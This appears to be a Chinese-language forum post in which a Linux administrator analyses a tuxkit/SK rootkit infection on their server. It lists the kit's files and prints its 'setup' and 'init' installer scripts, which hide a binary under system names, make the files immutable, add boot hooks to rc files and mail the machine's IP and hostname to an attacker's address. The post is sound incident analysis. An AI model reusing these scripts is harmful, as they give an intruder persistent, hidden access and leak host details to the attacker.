-rwx------ root/root 37844 2001-12-26 21:37:57 bin/top
-rwx------ root/root 4394 2001-12-26 21:37:57 bin/updatedb
-rwx------ root/root 42952 2001-12-26 21:37:57 bin/vdir
[root@angel tuxkit-1.0]# less cfg.tgz
-rw------- root/root 17 2001-11-11 19:12:19 cfg/.addr
-rw------- root/root 69 2001-11-12 23:06:32 cfg/.cron
-rw------- root/root 67 2001-12-27 20:54:23 cfg/.file
-rw------- root/root 13 2001-12-27 20:54:47 cfg/.log
-rw------- root/root 116 2001-12-27 20:55:29 cfg/.proc
[root@angel tuxkit-1.0]# less sshd.tgz
-rw------- virus/virus 828 2001-12-13 00:22:12 ssh2/hostkey
-rw------- virus/virus 697 2001-12-13 00:22:12 ssh2/hostkey.pub
-rw------- virus/virus 503 2001-12-27 20:43:12 ssh2/logo
-rw------- virus/virus 512 2001-12-13 23:51:33 ssh2/random_seed
-rwx------ virus/virus 1040220 2002-01-06 00:05:58 ssh2/sshd
-rw------- virus/virus 647 2001-12-27 22:42:20 ssh2/sshd2_config
[root@angel tuxkit-1.0]# less lib.tgz
lrwxrwxrwx root/root 0 2001-11-11 02:49:02 lib/libproc.so -> libproc.so.
2.0.7
################end###################
tuxkit在我的机器上生成了/dev/tux目录。其中有.addr、 .cron、 .file、 .log、.proc5个隐藏文件有关于tuxkit的配置信息
它在我的机器上生成了/usr/sbin目录。其中有tux、tux2w3c、tuxstat三个文件
它还在/lib下面生成tools、ssh2、bin三个目录,放置它用到的工具
在/lib下生成init、iplook、sk、setup四个文件。大家来看看:
setup的内容:
#!/bin/sh
#!/bin/bash
EMAIL="pradamea@yahoo.com" 就是这个家伙吧?!!!!
MYIP=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
echo "Installing the muie !"
chattr -saui /etc/rc.d/init.d/init /usr/bin/nfs /dev/ntfs
rm -rf /etc/rc.d/init.d/init /usr/bin/nfs /dev/ntfs
cp sk /usr/bin/nfs
cp sk /dev/ntfs
cp init /etc/rc.d/init.d/
chattr +saui /usr/bin/nfs /dev/ntfs /etc/rc.d/init.d/init
/etc/rc.d/init.d/init
chattr -saui /etc/rc.d/rc
chattr -saui /etc/rc.d/rc.local /etc/rc.d/rc.sysinit
echo "# init script" >>/etc/rc.d/rc
echo "# init script" >>/etc/rc.d/rc.local
echo "# init script" >>/etc/rc.d/rc.sysinit
echo " /etc/rc.d/init.d/init" >>/etc/rc.d/rc
echo " /etc/rc.d/init.d/init" >>/etc/rc.d/rc.local
echo " /etc/rc.d/init.d/init" >>/etc/rc.d/rc.sysinit
chattr +saui /etc/rc.d/rc /etc/rc.d/rc.local /etc/rc.d/rc.sysinit
#echo -e " $MYIP # `hostname -f`" | mail -s skrootkit $EMAIL
echo "Done"
cp iplook /usr/bin
chattr +saui /usr/bin/iplook
iplook
echo "----------------------------------------------"
echo -e "System information"
echo -e " Hostname : `hostname -f`"
echo -e " IP address : $MYIP `hostname -i`"
echo -e " Alt IPs : `/sbin/ifconfig | grep eth | wc -l`"
echo -e " Bogomips : `cat /proc/cpuinfo | grep bogomips | awk '{printf $3}'`"
if [ -f /etc/*release ]; then
echo -e " Distribution : `head -1 /etc/*release`"
fi
echo -e " Uptime : `uptime`"
rm -rf skrootkit.tgz
sk
init
iplook
rm -rf setup
iplook的内容:
#!/bin/bash
#
#########################################################################
# -- Echipa 1337 -- #
# #
# Coder: agressor (Echipa 1337). #
# E-Mail: agressor@1337.ro #
# Acest script va arata ip (de retea si eventual de internet) #
# Scriptul poate fi foarte folositor, #
# mai ales pentru cei care au alocate IP Dinamice. #
# #
#########################################################################
#
/sbin/ifconfig | grep "inet addr" | grep -v "127.0.0.1" | /
awk '{print $2;}' | awk -F':' '{print $2;}'
init的内容:
#!/bin/sh
#!/bin/bash
EMAIL="pradamea@yahoo.com"
MYIP=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
if [ -x /usr/bin/nfs ]
then
chattr +saui /usr/bin/nfs
else
cp /dev/ntfs /usr/bin/nfs
chattr +saui /usr/bin/nfs /dev/ntfs
fi
nfs &
nfs i `/sbin/pidof nfs`
echo -e " $MYIP # `hostname -f`" | mail -s reboot $EMAIL
与前文介绍不同,它没有修改我的/etc/rc.d/rc.sysinit而是直接吧我的/etc/rc.d/rc.local改成了这样子
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
touch /var/lock/subsys/local
#/usr/bin/init
# Running Xsf ...
/usr/bin/xsf -q 1>/dev/null 2>/dev/null
# Running Xchk ...
/usr/bin/xchk 1>/dev/null 2>/dev/null
但是我没发现xsf和xchk两个文件。
tuxkit在入侵后会生成一个ssh的后门。但是我却没弄清楚它是怎么安装到我的机器上的。是通过wuftp还是openssh的漏洞呢?
我已经把机器从2.4.10升级到了2.4.18。现在似乎没看到可以的进程
pe -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Sep19 ? 00:00:06 init
root 2 1 0 Sep19 ? 00:00:00 [migration_CPU0]
root 3 1 0 Sep19 ? 00:00:00 [migration_CPU1]
root 4 1 0 Sep19 ? 00:00:00 [migration_CPU2]
root 5 1 0 Sep19 ? 00:00:00 [migration_CPU3]
root 6 1 0 Sep19 ? 00:00:00 [keventd]
root 7 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU0]
root 8 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU1]
root 9 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU2]
root 10 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU3]
root 11 1 0 Sep19 ? 00:00:07 [kswapd]
root 12 1 0 Sep19 ? 00:00:09 [bdflush]
root 13 1 0 Sep19 ? 00:00:01 [kupdated]
root 14 1 0 Sep19 ? 00:00:00 [mdrecoveryd]
root 20 1 0 Sep19 ? 00:00:00 [aacraid]
root 21 1 0 Sep19 ? 00:00:00 [scsi_eh_0]
root 26 1 0 Sep19 ? 00:00:01 [kjournald]
root 77 1 0 Sep19 ? 00:00:00 [khubd]
root 151 1 0 Sep19 ? 00:00:00 [kjournald]
root 152 1 0 Sep19 ? 00:00:00 [kjournald]
root 153 1 0 Sep19 ? 00:00:00 [kjournald]
root 154 1 0 Sep19 ? 00:00:02 [kjournald]
root 155 1 0 Sep19 ? 00:00:07 [kjournald]
rpc 643 1 0 Sep19 ? 00:00:00 portmap
rpcuser 662 1 0 Sep19 ? 00:00:00 rpc.statd
root 751 1 0 Sep19 ? 00:00:01 /usr/sbin/sshd
root 785 1 0 Sep19 ? 00:00:00 rpc.rquotad
root 789 1 0 Sep19 ? 00:00:00 [nfsd]
root 790 1 0 Sep19 ? 00:00:00 [nfsd]
root 791 1 0 Sep19 ? 00:00:00 [nfsd]
root 792 1 0 Sep19 ? 00:00:00 [nfsd]
root 793 1 0 Sep19 ? 00:00:00 [nfsd]
root 794 1 0 Sep19 ? 00:00:00 [nfsd]
root 795 1 0 Sep19 ? 00:00:00 [nfsd]
root 796 1 0 Sep19 ? 00:00:00 [nfsd]
root 797 1 0 Sep19 ? 00:00:00 [lockd]
root 798 797 0 Sep19 ? 00:00:00 [rpciod]
root 804 1 0 Sep19 ? 00:00:00 rpc.mountd
root 813 1 0 Sep19 ? 00:00:00 gpm -t ps/2 -m /dev/mouse
bin 823 1 0 Sep19 ? 00:00:00 cannaserver -syslog -u bin
root 832 1 0 Sep19 ? 00:00:00 crond
xfs 891 1 0 Sep19 ? 00:00:00 xfs -droppriv -daemon
daemon 909 1 0 Sep19 ? 00:00:00 /usr/sbin/atd
oracle 983 1 0 Sep19 ? 00:00:20 ora_pmon_rnet
oracle 985 1 0 Sep19 ? 00:00:07 ora_dbw0_rnet
oracle 987 1 0 Sep19 ? 00:00:18 ora_lgwr_rnet
oracle 989 1 0 Sep19 ? 00:00:30 ora_ckpt_rnet
oracle 991 1 0 Sep19 ? 00:00:01 ora_smon_rnet
oracle 993 1 0 Sep19 ? 00:00:00 ora_reco_rnet
oracle 995 1 0 Sep19 ? 00:00:00 ora_arc0_rnet
oracle 1034 1 0 Sep19 ? 00:00:04 /usr/oracle/product/8.17/bin/tns
root 1053 1 0 Sep19 ? 00:00:01 /usr/NetVault6/bin/nvpmgr
root 1054 1053 0 Sep19 ? 00:00:00 nvcmgr 2
root 1058 1 0 Sep19 tty2 00:00:00 /sbin/mingetty tty2
root 1059 1 0 Sep19 tty3 00:00:00 /sbin/mingetty tty3
root 1060 1 0 Sep19 tty4 00:00:00 /sbin/mingetty tty4
root 1061 1 0 Sep19 tty5 00:00:00 /sbin/mingetty tty5
root 1062 1 0 Sep19 tty6 00:00:00 /sbin/mingetty tty6
root 1065 1053 0 Sep19 ? 00:00:03 nvnmgr 3
root 1315 1 0 Sep19 tty1 00:00:00 /sbin/mingetty tty1
root 30764 1 0 Sep22 ? 00:00:00 xinetd -stayalive -reuse -pidfil
root 4993 751 0 12:00 ? 00:00:00 /usr/sbin/sshd
root 4995 4993 0 12:00 pts/0 00:00:00 -bash
root 5145 1 0 12:10 ? 00:00:00 syslogd -m 0
root 5149 1 0 12:10 ? 00:00:00 klogd -x